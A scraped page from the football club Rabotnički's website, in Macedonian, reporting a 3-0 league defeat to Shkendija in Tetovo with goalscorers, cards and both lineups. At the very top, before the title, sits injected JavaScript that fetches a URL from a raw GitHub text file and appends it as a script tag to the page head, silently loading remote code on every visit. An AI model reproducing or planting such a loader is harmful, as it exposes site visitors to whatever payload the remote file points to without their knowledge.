;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Пораз (3-0) од Шкендија во Тетово
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Пораз (3-0) од Шкендија во Тетово

Работнички доживеа пораз (3-0) од Шкендија во рамките на 32.коло од Првата фудбалска лига. По овој загубен меч, Работнички и понатаму се наоѓа на четвртата позиција на табелата со 42 освоени бода, во пресрет на завршницата во шампионатот.

Шкендија поведе со 1-0 во 22.минута со голот на Стенио Жуниор. Тој доби употреблива топка зад одбраната на Работнички и со одмерен удар го лобуваше голманот Даниел Божиновски, кој му појде во пресрет со намера прв да стигне до топката.

Маркоски се закани на спротивната страна, но без ефект, а Шкендија на полувреме замина со еден гол предност.

Во 55.минута, Благоја Тодоровски го постигна вториот гол за домаќинот. Тој со удар со глава одлично ја зафати топката по центаршутот од десната страна и ја смести зад грбот на Божиновски. Во 66.минута, Нехар Садики беше исклучен по грубиот старт над Ферхан Хасани, а тоа беше дополнителен проблем за Работнички.

Шкендија поведе со 3-0 во 84.минута, кога Арменд Алими се најде во убава шанса и реализираше од 14 метри крај немоќниот Божиновски.

ШКЕНДИЈА – РАБОТНИЧКИ 3-0 (1-0)

Градски стадион во Тетово. Судија: Игор Стојчевски. Стрелци: Жуниор 22’, Тодоровски 55’, Алими 84’ (Шкендија). Ж. картони: Бојку, Муслиу (Шкендија), Ангелов, Маркоски (Работнички). Црвен картон: Садики (Работнички).

ШКЕНДИЈА: Реџепи, Бејтулаи, Муслиу, Цуцули, Бојку (70’ Зејнулаи), Вакили (79’ Садриу), Тодоровски (76’ Шефити), Алими, Фазлагиќ, Жуниор, Хасани.

РАБОТНИЧКИ: Божиновски, Крмар, Садики, Најдовски, Трајчевски, Шаркоски, Дурански, Петковски (58’ Кировски), Серџо јуниор, Маркоски, Ангелов.